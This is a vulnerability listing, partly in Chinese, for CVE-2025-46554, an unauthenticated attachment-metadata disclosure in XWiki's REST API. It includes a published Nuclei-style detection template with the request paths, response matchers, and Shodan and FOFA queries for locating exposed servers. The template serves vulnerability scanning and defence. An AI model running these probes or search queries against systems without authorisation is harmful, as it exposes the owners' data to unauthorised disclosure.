漏洞描述
A vulnerability in XWiki's REST API allows unauthenticated users to access attachments list and metadata through the attachments endpoint. This could lead to disclosure of sensitive information stored in attachments metadata.
CVE-2025-46554: XWiki REST API - Attachments Disclosure
PoC代码[已公开]
id: CVE-2025-46554
info:
name: XWiki REST API - Attachments Disclosure
author: ritikchaddha
severity: high
description: |
A vulnerability in XWiki's REST API allows unauthenticated users to access attachments list and metadata through the attachments endpoint. This could lead to disclosure of sensitive information stored in attachments metadata.
reference:
- https://jira.xwiki.org/browse/XWIKI-22424
- https://nvd.nist.gov/vuln/detail/CVE-2025-46554
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-285
cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
metadata:
max-request: 2
verified: true
vendor: xwiki
product: xwiki
shodan-query: html:"data-xwiki-reference"
fofa-query: body="data-xwiki-reference"
tags: cve,cve2025,xwiki,rest-api,exposure,vkev
http:
- method: GET
path:
- "{{BaseURL}}/{{path}}"
payloads:
path:
- "rest/wikis/xwiki/spaces/Sandbox/pages/WebHome/attachments"
- "xwiki/rest/wikis/xwiki/spaces/Sandbox/pages/WebHome/attachments"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains_any(header, 'text/xml', 'text/javascript')"
- "contains_all(body, '<attachments', '<item', '<longSize')"
condition: and
# digest: 4b0a00483046022100c5354f334dab43806bfd583cf05ec5fa53549483baeb8d3091dd2dc6a7ebd874022100ad376377b2c68534b57cc206fa373466daaedd80fde83e027adcded4d87c783d:922c64590222798bb761d5b6d8e72950